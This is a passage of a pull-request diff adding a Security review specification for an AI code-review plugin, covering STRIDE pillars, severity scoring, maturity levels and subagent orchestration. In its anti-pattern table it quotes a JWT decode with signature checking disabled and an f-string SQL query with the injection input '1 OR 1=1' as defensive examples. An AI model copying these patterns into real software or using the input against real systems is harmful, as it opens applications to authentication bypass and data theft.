+| Confidence thresholds (>80%, 50-80%, <50%) | Used in all 4 agent files | Confirm whether these specific thresholds derive from an industry standard or are original calibration choices |

--- a/spec/sec/spec.md
+++ b/spec/sec/spec.md
@@ -1,0 +1,231 @@
+# Security Domain Specification
+
+> Canonical reference for building, improving, and maintaining the Security review domain within the donkey-dev Claude Code plugin.
+
+## 1. Purpose
+
+The Security review domain evaluates code changes through the lens of threat modelling. It answers one question: **"If an attacker targets this, what can they achieve?"**
+
+The domain produces a structured maturity assessment that tells engineering leaders:
+- What an attacker can exploit today (Hygiene failures)
+- What security foundations are missing (L1 gaps)
+- What hardened security posture looks like for this codebase (L2 criteria)
+- What security excellence would require (L3 aspirations)
+
+## 2. Audience
+
+| Who | Uses the spec for |
+|-----|-------------------|
+| **Autonomous coding agents** | Building/modifying prompt files, agent definitions, skill orchestrators |
+| **Human prompt engineers** | Reviewing agent output, calibrating severity, refining checklists |
+| **Plugin consumers** | Understanding what the Security review evaluates and why |
+
+## 3. Conceptual Architecture
+
+The Security domain is built from three interlocking layers:
+
+```
++----------------------------------------------+
+|         STRIDE Framework (Structure)          |   Organises WHAT to review
+|  Spoofing . Tampering . Repudiation .         |
+|  Info Disclosure . DoS . Elevation            |
++----------------------------------------------+
+|   STRIDE (Threat)  <-->  Properties (Defence) |   Analytical LENSES
+|   "What can an         "What protects          |
+|    attacker do?"        against it?"           |
++----------------------------------------------+
+|         Maturity Model (Judgement)             |   Calibrates SEVERITY
+|    Hygiene --> L1 --> L2 --> L3                |   and PRIORITY
++----------------------------------------------+
+```
+
+- **STRIDE** provides the structural decomposition (6 threat categories distributed across 4 pillars, 4 subagents).
+- **STRIDE Threats** and **Security Properties** provide the analytical duality — threats are the "offensive" lens, security properties are the "defensive" lens.
+- **DREAD-lite** provides the severity scoring framework for individual findings.
+- **The Maturity Model** provides the judgement framework for prioritising findings.
+
+These layers are defined in detail in the companion files:
+- `glossary.md` — canonical definitions
+- `framework-map.md` — how STRIDE threats, security properties, and pillars relate to each other
+- `maturity-criteria.md` — detailed criteria with "sufficient" thresholds
+- `calibration.md` — worked examples showing severity judgement
+- `anti-patterns.md` — concrete code smells per pillar
+- `references.md` — source attribution
+
+## 4. File Layout
+
+The Security domain manifests as these files within the plugin:
+
+```
+donkey-dev/
+  agents/
+    security-authn-authz.md       # Subagent: Spoofing + Elevation of Privilege
+    security-data-protection.md   # Subagent: Information Disclosure + Tampering
+    security-input-validation.md  # Subagent: Tampering (Injection)
+    security-audit-resilience.md  # Subagent: Repudiation + Denial of Service
+  prompts/security/
+    _base.md                      # Shared context: STRIDE, DREAD-lite, maturity model, output format
+    authn-authz.md                # Authentication & Authorization pillar checklist
+    data-protection.md            # Data Protection pillar checklist
+    input-validation.md           # Input Validation pillar checklist
+    audit-resilience.md           # Audit & Resilience pillar checklist
+  skills/
+    review-security/SKILL.md      # Orchestrator: scope, parallel dispatch, synthesis, output
+```
+
+### Composition rules
+
+1. **Each agent file is self-contained.** It embeds the full content of `_base.md` + its pillar prompt. Agents do not reference external files at runtime — all context must be inlined.
+2. **Prompts are the source of truth.** The `prompts/security/` directory contains the human-readable, LLM-agnostic checklists. Agent files are compiled from these.
+3. **The skill orchestrator dispatches and synthesises.** It does not contain review logic — that lives in the agents.
+
+### When modifying files
+
+| Change type | Files to update |
+|-------------|-----------------|
+| Add/change a checklist item | `prompts/security/<pillar>.md` then recompile the corresponding `agents/security-<pillar>.md` |
+| Change shared context (severity, maturity, output format) | `prompts/security/_base.md` then recompile ALL 4 agent files |
+| Change orchestration logic | `skills/review-security/SKILL.md` only |
+| Add a new pillar | New prompt file, new agent file, update SKILL.md to spawn 5th agent |
+
+## 5. Design Principles
+
+These principles govern all prompt changes in the Security domain. They align with the cross-domain principles established in PRs #18 and #19 and must be preserved.
+
+### 5.1 Outcomes over techniques
+
+Maturity criteria describe **observable outcomes**, not named tools, libraries, or standards.
+
+| Bad (technique) | Good (outcome) |
+|-----------------|----------------|
+| "Uses SAST/DAST" | "Security checks run automatically in the build pipeline" |
+| "Implements OAuth 2.0" | "Authentication and authorisation are applied consistently on all protected paths" |
+| "Has a WAF" | "Input validation on all entry points" |
+| "Uses HashiCorp Vault" | "Secrets are loaded from environment or external store, not source" |
+
+**Rationale (PR #19):** Technique names create false negatives — a team using AWS Secrets Manager satisfies "secrets from external store" but wouldn't match "uses HashiCorp Vault". Outcomes are technology-neutral and verifiable from code.
+
+### 5.2 Questions over imperatives
+
+Checklists use questions to prompt investigation, not imperatives to demand compliance.
+
+| Bad (imperative) | Good (question) |
+|-------------------|-----------------|
+| "Enforce input validation" | "Is external input validated before processing?" |
+| "Use parameterized queries" | "Are parameterized queries or prepared statements used?" |
+
+**Rationale:** Questions guide the reviewer to investigate the code and form a judgement. Imperatives produce binary "present/absent" assessments that miss nuance.
+
+### 5.3 Concrete anti-patterns with exploit scenarios
+
+Anti-pattern descriptions include specific code-level examples AND how an attacker would exploit them.
+
+| Bad (abstract) | Good (concrete) |
+|-----------------|-----------------|
+| "Insecure authentication" | "`jwt.decode(token, options={\"verify_signature\": False})` — attacker crafts a token with any claims and it's accepted" |
+| "Injection vulnerability" | "`f\"SELECT * FROM users WHERE id = {user_id}\"` — attacker sends `1 OR 1=1` to dump all records" |
+
+### 5.4 Exploit path required for every finding
+
+Every security finding must include an exploit scenario. A vulnerability without an exploit path is a theoretical concern, not a finding. This is the core distinction between security review and security audit — the review focuses on **exploitable** weaknesses.
+
+### 5.5 Positive observations required
+
+Every review MUST include a "What's Good" section. Reviews that only list problems are demoralising and less actionable. Positive security patterns give teams confidence about what to preserve and build on.
+
+### 5.6 Confidence thresholds reduce noise
+
+Security reviews are particularly prone to false positives. The confidence threshold system exists to maintain signal quality:
+- **HIGH (>80%)**: Clear exploit path visible in code — MUST REPORT
+- **MEDIUM (50-80%)**: Requires specific conditions — REPORT with caveat
+- **LOW (<50%)**: Theoretical — DO NOT REPORT
+
+This is a deliberate trade-off: prefer fewer, higher-confidence findings over comprehensive-but-noisy reports. Teams stop reading security reviews that cry wolf.
+
+### 5.7 Hygiene gate is consequence-based
+
+The Hygiene gate uses three consequence-severity tests (Irreversible, Total, Regulated), not domain-specific checklists. This ensures consistent escalation logic across all domains.
+
+### 5.8 Severity is about exploitation impact
+
+| Level | Definition | Decision |
+|-------|-----------|----------|
+| **HIGH** | Direct exploitation leads to RCE, data breach, or auth bypass | Must fix before merge |
+| **MEDIUM** | Requires specific conditions, significant impact if exploited | May require follow-up ticket |
+| **LOW** | Limited impact, defence-in-depth improvement | Nice to have |
+
+Severity measures **exploitation consequence**, not how hard the fix is.
+
+### 5.9 Explicit exclusions reduce noise
+
+The Security domain maintains a deliberate exclusion list (see `glossary.md`). These are categories that create noise without value in a code review context because they are either handled by dedicated tooling (dependency scanning, secret scanning) or are theoretical without a demonstrated exploit path.
+
+## 6. Orchestration Process
+
+The `/review-security` skill follows this process:
+
+### Step 1: Scope identification
+
+- File or directory argument: review that path
+- Empty or ".": review recent changes (`git diff`) or prompt for scope
+- PR number: fetch the diff
+
+### Step 2: Parallel dispatch
+
+Spawn 4 subagents simultaneously:
+
+| Agent | Model | Rationale |
+|-------|-------|-----------|
+| `security-authn-authz` | sonnet | Nuanced judgement on auth bypass patterns and privilege escalation |
+| `security-data-protection` | sonnet | Complex analysis of crypto usage, secrets exposure, data classification |
+| `security-input-validation` | sonnet | Subtle injection pattern recognition across frameworks |
+| `security-audit-resilience` | haiku | More binary checklist (rate limits exist or not, audit logs present or not) |
+
+**Model selection rationale:** The authn-authz, data-protection, and input-validation pillars require nuanced pattern recognition — detecting subtle auth bypasses, evaluating cryptographic choices, and recognising framework-specific injection patterns. The audit-resilience pillar is more binary (rate limiting exists or doesn't, audit logging present or not) and can use a faster model.
+
+### Step 3: Synthesis
+
+1. **Collect** findings from all 4 pillars
+2. **Apply confidence filter** — remove findings below 50% confidence
+3. **Deduplicate** — when two agents flag the same `file:line`, merge into one finding:
+   - Take the **highest severity**
+   - Take the **most restrictive maturity level** (HYG > L1 > L2 > L3)
+   - Combine recommendations from both agents
+   - Credit both pillars in the STRIDE column (e.g., "T / I" for Tampering + Information Disclosure)
+4. **Aggregate maturity** — merge per-criterion assessments into one view:
+   - All criteria met = `pass`
+   - Mix of met and not met = `partial`
+   - All criteria not met = `fail`
+   - Previous level not passed = `locked`
+5. **Prioritise** — HYG findings first, then by severity (HIGH > MEDIUM > LOW)
+
+### Step 4: Output
+
+Produce the maturity assessment report per the output format defined in `_base.md`.
+
+## 7. Improvement Vectors
+
+Known gaps that future work should address, in priority order:
+
+| # | Gap | Impact | Direction |
+|---|-----|--------|-----------|
+| 1 | **No calibration examples in prompts** | Severity judgements are inconsistent across runs | Add worked examples per severity per pillar (see `calibration.md` in this spec) |
+| 2 | **Pillar overlap on Tampering** | Input-validation and data-protection both cover Tampering, risking duplicates | Clarify boundary: input-validation owns injection (untrusted input alters behaviour), data-protection owns integrity (data modified at rest or in transit). Document in `framework-map.md` |
+| 3 | **No technology-specific supplements** | Checklists can't recognise framework-specific patterns beyond the basic table | Future: add optional supplements for Python, Java, Go, Node, .NET, React, Django, Rails |
+| 4 | **DREAD-lite is applied inconsistently** | Some findings use DREAD factors explicitly, others just state HIGH/MEDIUM/LOW | Future: enforce that each finding includes Damage/Exploitability/Affected Scope assessment |
+| 5 | **Audit-resilience model mismatch** | Audit (Repudiation) and DoS (Denial of Service) are fundamentally different concern types paired in one agent | Evaluate whether splitting into two agents would improve focus. Counter-argument: both are "operational security" concerns and haiku handles the lighter workload |
+| 6 | **No threat model composition** | Reviews are stateless — no way to build a cumulative threat model across multiple reviews | Future: use `.code-review/` history to build up a threat model over time |
+| 7 | **Supply chain security not covered** | No pillar addresses dependency supply chain risks | Currently excluded (handled by dependency scanning tools). Evaluate if actionable code-level patterns exist |
+| 8 | **No cross-review learning** | Each review starts from scratch | Future: use `.code-review/` history to track security posture progression |
+
+## 8. Constraints
+
+Things the Security domain deliberately does NOT do:
+
+- **No auto-fix.** The review is read-only. Agents have Read, Grep, Glob tools only — no Bash, no Write, no Edit.
+- **No cross-domain findings.** Security does not flag architecture, SRE, or data issues. Those belong to their respective domains.
+- **No numeric scores.** Status is pass/partial/fail/locked. No percentages, no weighted DREAD scores, no CVSS.
+- **No prescribing specific tools.** Never recommend a specific library, vendor, or standard. Describe the outcome, let the team choose the implementation.
+- **No dependency scanning.** Outdated dependencies with known CVEs are handled by dedicated tools (Dependabot, Snyk, etc.). The Security review focuses on code-level vulnerabilities.
+- **No secret scanning.** Committed secrets are handled by dedicated tools (git-secrets, TruffleHog, etc.). The Security review flags hardcoded secrets visible in the code being reviewed, but does not scan git history.
+- **No penetration testing.** The review analyses code statically. It does not execute code, send requests, or probe running services.

--- a/spec/sre-spec.md
+++ b/spec/sre-spec.md
@@ -1,3 +1,0 @@
-# SRE Spec
-
-TODO - Complete this specification.


### PR DESCRIPTION
## Summary
- Add `spec/sec/spec.md` — the canonical Security domain specification defining STRIDE threat modelling (Spoofing, Tampering, Repudiation, Info Disclosure, DoS, Elevation of Privilege), security properties defence lens, DREAD-lite severity scoring, and the maturity model
- Add 6 companion documents:
  - `glossary.md` — canonical definitions for all security terms, STRIDE categories, and exclusions
  - `framework-map.md` — how STRIDE threats map to security properties and review pillars
  - `maturity-criteria.md` — detailed criteria with "sufficient" thresholds per level
  - `calibration.md` — worked examples for severity and maturity judgement
  - `anti-patterns.md` — concrete exploit patterns organised by pillar
  - `references.md` — source attribution for all frameworks and concepts
- Update `spec/README.md` to add security spec entry and fix SRE spec path
- Remove superseded `spec/sre-spec.md` placeholder

## Test plan
- [ ] Verify spec structure: all companion files referenced in `spec.md` Section 3 exist
- [ ] Verify glossary covers all STRIDE categories and security properties
- [ ] Verify framework-map correctly links STRIDE threats to security properties and pillars
- [ ] Verify maturity-criteria covers all four levels (Hygiene, L1, L2, L3) for each pillar
- [ ] Verify file layout in Section 4 matches the planned plugin directory structure
- [ ] Verify `spec/README.md` links resolve correctly

🤖 Generated with [Claude Code](https://claude.com/claude-code)